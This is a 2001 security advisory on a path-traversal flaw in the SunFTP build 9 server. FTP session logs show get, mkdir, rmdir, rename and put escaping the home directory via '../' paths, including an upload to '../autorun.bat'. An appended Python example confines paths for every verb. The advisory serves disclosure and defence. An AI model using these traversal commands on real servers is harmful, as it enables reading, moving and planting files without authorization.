SECURITYVULNS:DOC:1343
Mar 03, 2001

Sunftp build9(1) - ftp server Vulnerability


It is possible to break out of the root directory by using relative paths.

e:\crap was used as the home directory of user test.

#the get command#

Getting files from outside of the root directory:

220 chris FTP Server (SunFTP b9) ready on port 21…
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s

#the mkdir command#

Without the privilege to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.

Hell! It's getting worse…

#the rmdir command#

Without any privilege to remove anything:

ftp> rmdir ../test
250 '/../test': directory removed.

This only works with empty directories.

#the rename command#

It is possible to rename files outside of the root directory without
permissions. It is also possible to move files with the rename command
when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s

#the put command#

If you have permission to upload files, you can put these files outside of
the home directory.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok

Solution

No quick bugfix. Use with care.

I tried to contact the authors, but their webpage seems to be down.
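
Added example (not part of the original advisory and not SunFTP's code): the sessions above show CWD refusing to leave the home directory while get, mkdir, rmdir, rename and put accept the same relative path, so this Python code runs one confinement check for every path-taking command. The function names and the constructed sample commands are assumptions; e:\crap is the home directory from the advisory.

```python
import ntpath

ROOT = r"e:\crap"  # home directory of user "test" in the advisory
# Every FTP verb that takes a path; the client's get/put/mkdir/rmdir/rename
# send RETR/STOR/MKD/RMD/RNFR+RNTO on the wire.
PATH_VERBS = {"CWD", "RETR", "STOR", "MKD", "RMD", "RNFR", "RNTO"}


def resolve_ftp_path(root, vcwd, arg):
    """Return the real path for `arg` inside `root`, or raise PermissionError."""
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    # Absolute arguments start at the virtual root, relative ones at the cwd.
    parts = [] if arg.startswith("/") else [p for p in vcwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # would climb above the virtual root
                raise PermissionError("path escapes FTP root")
            parts.pop()
        elif set(comp) == {"."} or ":" in comp:
            # Reject "..." style names and drive or stream specifiers.
            raise PermissionError("illegal path component")
        else:
            parts.append(comp)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Second, independent check on the final path.
    base = ntpath.normcase(root)
    if ntpath.commonpath([base, ntpath.normcase(real)]) != base:
        raise PermissionError("path escapes FTP root")
    return real


def authorize(verb, arg, vcwd="/"):
    """True if the command may proceed; the same check runs for every verb."""
    if verb.upper() not in PATH_VERBS:
        return True
    try:
        resolve_ftp_path(ROOT, vcwd, arg)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    # Constructed inputs modelled on the advisory's session.
    for verb, arg in [("RETR", "test.txt"), ("RETR", "../sunftptest.txt"),
                      ("MKD", "../test"), ("STOR", "..\\autorun.bat")]:
        print(verb, arg, "->", "allow" if authorize(verb, arg) else "550 deny")
```

The check is purely lexical; a server on a real filesystem should also resolve links and junctions on the final path before comparing it with the root.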
